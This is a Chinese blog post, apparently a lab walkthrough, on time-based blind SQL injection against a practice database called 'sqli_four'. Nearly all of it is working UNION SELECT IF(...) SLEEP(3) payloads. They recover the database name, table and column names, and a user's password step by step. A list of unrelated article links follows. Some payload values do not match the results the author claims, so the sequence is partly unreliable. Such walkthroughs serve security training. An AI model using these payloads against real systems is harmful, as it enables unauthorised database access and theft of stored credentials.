当前位置: 首页 > news >正文

延迟注入

猜数据库长度:9位

union select if(length(database())=9, sleep(3), 0), 2;--

猜数据库名:sqli_four

UNION SELECT IF(database()="sqli_four", SLEEP(3), 0), 2;--

猜数据库表数量:2

UNION SELECT IF((select count(table_name) from information_schema.tables where table_schema = database())=2, SLEEP(3), 0), 2;--

猜测表名长度: 表一:19位 表2:5位

UNION SELECT IF(length((select table_name from information_schema.tables where table_schema='sqli_four' limit 0,1))=8, SLEEP(3), 0), 2;--

猜表2表名:users

UNION SELECT IF(ascii(substr((select table_name from information_schema.tables where table_schema='sqli_four' limit 1,1),1,1))=101, SLEEP(3), 0), 2;--

猜第一列长度:2

UNION SELECT if(length((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 0,1))=2, sleep(3), 0), 2;--

猜第一列名:id

UNION SELECT if((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 0,1)="id", sleep(3), 0), 2;--

猜第二列长度:8

UNION SELECT if(length((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 1,1))=2, sleep(3), 0), 2;--

猜第二列名:password

UNION SELECT if((select column_name from information_schema.columns where table_schema='sqli_four' and table_name='users' limit 1,1)="password", sleep(3), 0), 2;--

查询有几个记录:1条

union select if((select count(id) from users)=1,sleep(3), 0), 2;--

查询第一个id长度:1

union select if(length((select id from sqli_four.users limit 0,1))=5, sleep(3), 0), 2;--

查询第一个id值:1

union select if((select id from sqli_four.users limit 0,1)=1, sleep(3), 0), 2;--

查询id=1的密码长度:4

union select if(length((select password from sqli_four.users limit 0,1))=4, sleep(3), 0), 2;--

查询id=1的密码值:4961

union select if(ascii(substr((select password from sqli_four.users limit 0,1),1,1))=101, sleep(3), 0), 2;--

http://www.jsqmd.com/news/57823/

相关文章:

  • 20. 亲和性
  • SQL注入原理与方法
  • tomcat-pass-getshell
  • ThinkPHP 6
  • ORM注入
  • SSTI靶场
  • 2025空调配套优选!空调机组风机哪家好?高适配品牌盘点
  • CORS配置错误
  • MySQL运维
  • Springboot框架-泄露
  • React的设计理念与核心特性 - 指南
  • 拖库的七种方法
  • 2025年厦门AI形象美学机构权威推荐榜单:魔近AI‌/魔近形象美学‌/魔近AI形象美学‌源头机构精选
  • 语言安全
  • 2025年情人节送女友礼物推荐:哪样最显心意?深度解析与避坑指南
  • 实用指南:​​MQTT协议发展历程与版本演进:从工业监控到物联网核心的协议进化​
  • 2025苏南喷塑加工优质厂家TOP5权威推荐:喷塑加工厂家
  • GEO推广活动TOP5权威推荐:深度测评指南,甄选企业领跑A
  • 2025年高压软启动柜优质厂家、实力厂商、来图定制企业推荐榜
  • 2025年移民服务机构综合测评:十大移民公司关键数据与适配场景全解析
  • 气体分析仪厂家如何选择?2025年十大品牌综合评测与场景化选型指南
  • 案例库--管辖地为原告住所地的约定有效
  • C#/.NET/.NET Core优秀项目和框架2025年11月简报
  • 2025证件照免费生成软件TOP榜出炉!5款一键搞定神器第一名真的绝了
  • Solon v3.7 黑科技: 消灭空指针异常!
  • kmeans聚类,无需标签,无监督学习
  • 2025年江西金属屋面系统公司推荐,江西南匠建筑材料有限公司
  • 北京丰宝斋上门回收字画15210016680
  • 10 个值得关注的 PHP 冷门包 不常用但非常值得推荐
  • 2025 年 12 月电力变压器,干式变压器,箱式变压器厂家最新推荐,聚焦资质、案例、售后的十家机构深度解读!